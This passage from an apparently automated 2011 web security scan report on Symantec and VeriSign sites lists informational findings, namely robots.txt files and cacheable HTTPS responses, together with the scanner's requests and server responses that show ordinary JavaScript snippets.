Path:	/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: query.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:22 GMT
Content-Type: text/plain
Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT
Content-Length: 26
Cache-Control: public, max-age=2592000
Expires: Sun, 09 Oct 2011 21:46:22 GMT
Connection: close

User-agent: *
Disallow: /

20.30. http://rs.instantservice.com/resources/smartbutton/5851/II3_Servers.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.instantservice.com
Path:	/resources/smartbutton/5851/II3_Servers.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rs.instantservice.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:14 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 18:16:35 GMT
ETag: "1a-887f66c0"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /

20.31. http://searchg.symantec.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://searchg.symantec.com
Path:	/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: searchg.symantec.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:33:30 GMT
Content-Type: text/plain
Last-Modified: Mon, 25 Apr 2011 16:15:31 GMT
Content-Length: 26
Cache-Control: public, max-age=2592000
Expires: Sun, 09 Oct 2011 21:33:30 GMT
Connection: close

User-agent: *
Disallow: /

20.32. https://ssl-certificate-center.verisign.ch/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.ch
Path:	/process/retail/console_login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ssl-certificate-center.verisign.ch

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:44 GMT
Server: Apache
Set-Cookie: TLTHID=35E8520EDB2D10DB64618BD14E31479C; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

20.33. https://ssl-certificate-center.verisign.com/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/console_login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ssl-certificate-center.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:45 GMT
Server: Apache
Set-Cookie: TLTHID=36B3AC56DB2D10DB49F6B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

20.34. https://symantec-corporation.com/servlet/campaignrespondent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://symantec-corporation.com
Path:	/servlet/campaignrespondent

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: symantec-corporation.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:30 GMT
Server: Apache
Last-Modified: Wed, 25 Aug 2010 22:10:50 GMT
ETag: "4500a0-1a-48ead277f8e80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

20.35. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://symantec.tt.omtrdc.net
Path:	/m2/symantec/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: symantec.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Fri, 09 Sep 2011 21:31:00 GMT
Accept-Ranges: bytes
ETag: W/"25-1309299047000"
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Content-Length: 25

User-agent: *
Disallow: /

20.36. https://test-products.verisign.com/geocenter/reseller/logon.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://test-products.verisign.com
Path:	/geocenter/reseller/logon.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: test-products.verisign.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:46:49 GMT
Content-Length: 26
Content-Type: text/plain

User-agent: *
Disallow: /

20.37. https://trust-center.verisign.ch/process/retail/trust_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.ch
Path:	/process/retail/trust_initial

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: trust-center.verisign.ch

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:48 GMT
Server: Apache
Set-Cookie: TLTHID=3836F65ADB2D10DB68D2A5440567C536; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

20.38. https://trust-center.verisign.com/process/retail/trust_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_initial

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: trust-center.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=6477053CDB2A10DB6A74CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

20.39. http://twitter.com/statuses/user_timeline/pctools.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/statuses/user_timeline/pctools.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:05:29 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 18:09:12 GMT
Accept-Ranges: bytes
Content-Length: 519
Cache-Control: max-age=86400
Expires: Sat, 10 Sep 2011 22:05:29 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/plain; charset=UTF-8

#Google Search Engine Robot
User-agent: Googlebot
# Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl
Allow: /*?*_escaped_fragment_
Disallow: /*?
Disallow: /*/with_friends

#Yahoo! Search Engine Ro
...[SNIP]...

20.40. http://us.norton.com/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: us.norton.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 534
Last-Modified: Thu, 29 Jul 2010 20:29:17 GMT
ETag: "216-4c51e49d"
Accept-Ranges: bytes
Content-Type: text/plain
Cache-Control: public, max-age=14760
Date: Fri, 09 Sep 2011 21:30:57 GMT
Connection: close

User-agent:*
Disallow:/common/
Disallow:/content/
Disallow:/corp/
Disallow:/css/
Disallow:/ssi/
Disallow:/lib/
Disallow:/errors/
Disallow:/feedback/
Disallow:/media/
Disallow:/script/
Disal
...[SNIP]...

20.41. https://us.norton.com/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://us.norton.com
Path:	/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: us.norton.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 534
Last-Modified: Thu, 29 Jul 2010 20:29:17 GMT
ETag: "216-4c51e49d"
Accept-Ranges: bytes
Content-Type: text/plain
Cache-Control: public, max-age=21595
Date: Fri, 09 Sep 2011 21:47:34 GMT
Connection: close

User-agent:*
Disallow:/common/
Disallow:/content/
Disallow:/corp/
Disallow:/css/
Disallow:/ssi/
Disallow:/lib/
Disallow:/errors/
Disallow:/feedback/
Disallow:/media/
Disallow:/script/
Disal
...[SNIP]...

20.42. https://www-secure.symantec.com/feedback/webmaster.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/feedback/webmaster.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www-secure.symantec.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Fri, 09 Sep 2011 17:26:24 GMT
ETag: "33-4e6a4c40"
Content-Type: text/plain
Cache-Control: public, max-age=8132
Date: Fri, 09 Sep 2011 21:47:33 GMT
Content-Length: 51
Connection: close

User-agent:*
Disallow:/*
Allow:/norton-support/

20.43. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Fri, 09 Sep 2011 21:25:58 GMT
Expires: Fri, 09 Sep 2011 21:25:58 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

20.44. http://www.symantec.com/scripts/swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/scripts/swfobject.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.symantec.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Wed, 18 May 2011 10:02:58 GMT
ETag: "1147-4dd39952"
Content-Type: text/plain
Cache-Control: public, max-age=1476
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Length: 4423
Connection: close

# Standard List
User-agent: *
Disallow: /common/
Disallow: /content/
Disallow: /corp/
Disallow: /css/
Disallow: /ssi/
Disallow: /lib/
Disallow: /errors/
Disallow: /feedback/
Disallow: /media
...[SNIP]...

20.45. http://www.verisign.ch/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.verisign.ch

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:12 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:21:58 GMT
ETag: "2e58be0-5a-49a38c4d54580"
Accept-Ranges: bytes
Content-Length: 90
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /dm/
Disallow: /images/
Disallow: /Unlinked_Pages/
Disallow: /dev/

20.46. http://www.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:38 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
Accept-Ranges: bytes
Content-Length: 2539
Expires: Sun, 09 Oct 2011 21:24:38 GMT
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /aol/
Disallow: /att/
Disallow: /authentic/
Disallow: /aventail/
Disallow: /b2b/
Disallow: /cd/
Disallow: /cdrom/
Disallow: /cgi-bin/
Disallow: /checkpoint/
Disallow: /client/

...[SNIP]...

20.47. https://www.verisign.com/products/site/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/products/site/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:47 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
Accept-Ranges: bytes
Content-Length: 2539
Expires: Sun, 09 Oct 2011 21:27:47 GMT
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /aol/
Disallow: /att/
Disallow: /authentic/
Disallow: /aventail/
Disallow: /b2b/
Disallow: /cd/
Disallow: /cdrom/
Disallow: /cgi-bin/
Disallow: /checkpoint/
Disallow: /client/

...[SNIP]...

21. Cacheable HTTPS response previous next
There are 73 instances of this issue:

https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js
https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js
https://cdn.verisign.com/authweb/global/assets/header/js/header.js
https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
https://cdn.verisign.com/authweb/global/assets/home/js/home.js
https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js
https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js
https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
https://cert.webtrust.org/ViewSeal
https://fileconnect.symantec.com/
https://forms.verisign.com/websurveys/servlet/ActionMultiplexer
https://idprotect.verisign.com/common/scripts/dlText.js
https://idprotect.verisign.com/secureredirect.v
https://idprotect.verisign.com/toolbar/downloadIE.v
https://knowledge.verisign.ch/support/code-signing-support/index.html
https://knowledge.verisign.ch/support/digital-id-support/index.html
https://knowledge.verisign.ch/support/mpki-support/index.html
https://knowledge.verisign.ch/support/ssl-certificates-support/index
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
https://knowledge.verisign.ch/support/trust-seal-support/index.html
https://knowledge.verisign.com/favicon.ico
https://knowledge.verisign.com/support/code-signing-support/index
https://knowledge.verisign.com/support/code-signing-support/index.html
https://knowledge.verisign.com/support/digital-id-support/index.html
https://knowledge.verisign.com/support/eca-support/index.html
https://knowledge.verisign.com/support/mpki-for-ssl-support/index
https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
https://knowledge.verisign.com/support/mpki-support/index.html
https://knowledge.verisign.com/support/ssl-certificates-support/index
https://knowledge.verisign.com/support/ssl-certificates-support/index.html
https://knowledge.verisign.com/support/trust-seal-support/index.html
https://partnernet.symantec.com/
https://policy3.responsys.net/
https://policy3.responsys.net/permission.htm
https://policy3.responsys.net/privacy.htm
https://press.verisign.com/easyir/customrel.do
https://products.verisign.com/geocenter/reseller/doregister.do
https://products.verisign.com/geocenter/reseller/logon.do
https://products.verisign.com/geocenter/reseller/logon.jsp
https://products.verisign.com/geocenter/reseller/register.do
https://query.verisign.com/search
https://renewals.symantec.com/renewals/application
https://renewals.symantec.com/renewals/chat_form.jsp
https://renewals.symantec.com/renewals/chat_norton.jsp
https://renewals.symantec.com/renewals/renewal_search.jsp
https://renewals.symantec.com/renewals/symantec_where_sn.jsp
https://seal.verisign.com/getseal
https://securitycenter.verisign.com/
https://securitycenter.verisign.com/celp/enroll/outsideSearch
https://test-products.verisign.com/geocenter/reseller/logon.do
https://us.norton.com/index.jsp
https://vipmobile.verisign.com/home.v
https://vipmobile.verisign.com/supportedphones.v
https://www-secure.symantec.com/
https://www-secure.symantec.com/about/profile/policies/eulas/index.jsp
https://www-secure.symantec.com/about/profile/policies/legal.jsp
https://www-secure.symantec.com/about/profile/policies/privacy.jsp
https://www-secure.symantec.com/business/theme.jsp
https://www-secure.symantec.com/feedback/contactus.jsp
https://www-secure.symantec.com/feedback/webmaster.jsp
https://www-secure.symantec.com/globalsites/index.jsp
https://www-secure.symantec.com/index.jsp
https://www-secure.symantec.com/rss/index.jsp
https://www-secure.symantec.com/sitemap/index.jsp
https://www.verisign.com/
https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
https://www.verisign.com/authweb/global/assets/shared/js/rotator.js
https://www.verisign.com/products-services/index.html

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

21.1. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/en_us/assets/shared/js/google-analytics.js

Request

GET /authweb/en_us/assets/shared/js/google-analytics.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 69191
Expires: Sun, 09 Oct 2011 02:25:41 GMT
Content-Length: 461

var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-295855-1']);
   _gaq.push(['_setDomainName', '.verisign.com']);
   _gaq.push(['_trackPageview']);

(function() {
   var ga = document.createElement('scr
...[SNIP]...

21.2. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/header/js/flyouts.js

Request

GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 13
Expires: Sun, 09 Oct 2011 21:38:30 GMT
Content-Length: 8048

//----------------------------------------//
// My Account M-flyout form functionality
//----------------------------------------//

$("#myacc_search_btn").click(function(){
//document.get
...[SNIP]...

21.3. https://cdn.verisign.com/authweb/global/assets/header/js/header.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/header/js/header.js

Request

GET /authweb/global/assets/header/js/header.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 13
Expires: Sun, 09 Oct 2011 21:38:30 GMT
Content-Length: 1558

/*******************************************
** Header functions **
*******************************************/
//----------------------------------------//
//Load Defaults when DOM i
...[SNIP]...

21.4. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/header/js/jquery.autocomplete.js

Request

GET /authweb/global/assets/header/js/jquery.autocomplete.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 14
Expires: Sun, 09 Oct 2011 21:38:30 GMT
Content-Length: 22148

/*
* jQuery Autocomplete plugin 1.1
*
* Copyright (c) 2009 J..rn Zaefferer
*
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* ht
...[SNIP]...

21.5. https://cdn.verisign.com/authweb/global/assets/home/js/home.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/home/js/home.js

Request

GET /authweb/global/assets/home/js/home.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 16
Expires: Sun, 09 Oct 2011 21:38:32 GMT
Content-Length: 2725

/*******************************************
** HP specific functions **
*******************************************/

//External link functionality
$('a[rel="external"]').click(funct
...[SNIP]...

21.6. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/global-preload.js

Request

GET /authweb/global/assets/shared/js/global-preload.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 69230
Expires: Sun, 09 Oct 2011 02:24:38 GMT
Content-Length: 135518

// FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.js
/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the M
...[SNIP]...

21.7. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/google-analytics.js

Request

GET /authweb/global/assets/shared/js/google-analytics.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:28 GMT
Content-Length: 471

var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-295855-1']);
   _gaq.push(['_setDomainName', '.verisign.com']);
   _gaq.push(['_trackPageview']);

(function() {
   var ga = document.createElemen
...[SNIP]...

21.8. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.boxshadow.js

Request

GET /authweb/global/assets/shared/js/jquery.boxshadow.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:27 GMT
Content-Length: 1538

/* **
* jquery-boxshadow.js
*
* $(object).boxshadow({
* hOffset : 3,
* vOffset : 3,
* shadowblur : 3,
* color : '#808080'
* })
*
* If you are using this with IE, you should s
...[SNIP]...

21.9. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.cacheimage.js

Request

GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 1
Expires: Sun, 09 Oct 2011 21:38:26 GMT
Content-Length: 1356

/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plugin can be used to eliminate flashes of unstyled content (FOUC) and
* improve perceived
...[SNIP]...

21.10. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.hover_intent.js

Request

Response

21.11. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/oo-engine.js

Request

GET /authweb/global/assets/shared/js/oo-engine.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:28 GMT
Content-Length: 1154

/* OnlineOpinion (S3tS v3.1) */

/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */

var custom_var,
...[SNIP]...

21.12. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/rotator.js

Request

GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 77341
Expires: Sun, 09 Oct 2011 00:09:34 GMT
Content-Length: 4102

var activeBannerId = "";
var activeBannerControllerId = "";
var activeTipId = "";
var rotate = true;
var myBannerNumber = 1;
var activeBannerNumber = myBannerNumber;
var bannerItemsLength = $(
...[SNIP]...

21.13. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/shared.js

Request

GET /authweb/global/assets/shared/js/shared.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:29 GMT
Content-Length: 37327

// FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plug
...[SNIP]...

21.14. https://cert.webtrust.org/ViewSeal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cert.webtrust.org
Path:	/ViewSeal

Request

GET /ViewSeal HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 20:14:30 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Type: text/html
Content-Length: 2834

java.lang.NumberFormatException: null
   at java.lang.Integer.parseInt(Integer.java:394)
   at java.lang.Integer.parseInt(Integer.java:476)
   at ca.cica.servlets.WebContext.getFormInt(WebContext.java:29)

...[SNIP]...

21.15. https://fileconnect.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://fileconnect.symantec.com
Path:	/

Request

GET / HTTP/1.1
Host: fileconnect.symantec.com
Connection: keep-alive
